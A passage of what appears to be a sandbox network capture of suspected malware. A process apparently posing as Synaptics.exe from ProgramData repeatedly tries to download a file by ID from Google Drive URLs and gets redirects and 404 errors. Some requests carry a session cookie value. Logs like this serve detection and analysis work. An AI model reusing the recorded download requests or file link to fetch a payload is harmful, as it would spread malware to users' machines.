                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-1hJselt7JyWs-IlT9xc4IA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:29 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:29 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="3bAhpZbAxewhemjARX0ZQg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:29 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    15 | 192.168.2.9 | 49742 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:29 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:29 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-z5sSZeGh8oNd0N42wzeGdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    16 | 192.168.2.9 | 49744 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:29 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:29 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-hD00xHZ6S1zPWwdbLkzOmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    17 | 192.168.2.9 | 49747 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:30 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:30 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:30 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-iKshvlXGgPh6S8FVPwfrHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    18 | 192.168.2.9 | 49748 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:30 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:30 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC67ZWE3HbwZYYqmy-HkpddXX9XWeXrshRkh9nu22j3_7I_JBJyIlOpc6eiiSQQEpnGpCRfOFjs
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:30 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-5uNVTAlXcFdEHk_x6A0qrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:30 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:30 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="n14l0NCArwvQnVXGJCM-mA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:30 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    19 | 192.168.2.9 | 49749 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:30 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:30 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:30 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-bGeGaeWFrNRPalmwcesekA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    20 | 192.168.2.9 | 49750 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:30 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:30 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4qSo2eWnQVRGGSs6Nd4z5cyzrXMkCxLJ6jBB7LVu4A9e4A40V4f6VbAbscLz5-I1hvMU-T3Wo
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:30 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-UVVVf8XLAMoyvuA2LbwP4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:30 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:30 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="2KuUUsME0is0ZHYXUtalOg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:30 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    21 | 192.168.2.9 | 49753 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:31 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:31 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6piQqX4YpAYSnGK5rmpf9m-AiYJzujFWjmJ5R0iXX-Iqrg4Gdojq1JH_FCsWMVcsIzGlPYdCg
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:31 GMT
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-e1U2MPuRcfP1zzin763k-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:31 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:31 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="xfRfNaqd14hL163v39bq4Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:31 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    22 | 192.168.2.9 | 49752 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:31 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:31 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:31 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-1wAsh459IkKEjMVq73J_Ew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    23 | 192.168.2.9 | 49754 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:31 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:31 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:31 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-o0vLVM6S6m-RpUbQKlWz6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    24 | 192.168.2.9 | 49755 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:32 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:32 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC5e2vE356ToewocaN3t2l_I36XsW71uHFHmBre1Hzxf4yI-4zSDBaQAhgIVPx7bU1T6
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:32 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Hg8rX6lgkU-loeZeSn9YQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:25:32 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:32 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="py9GQjqLophvJqVLDZKi_w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:32 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.9 | 49757 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
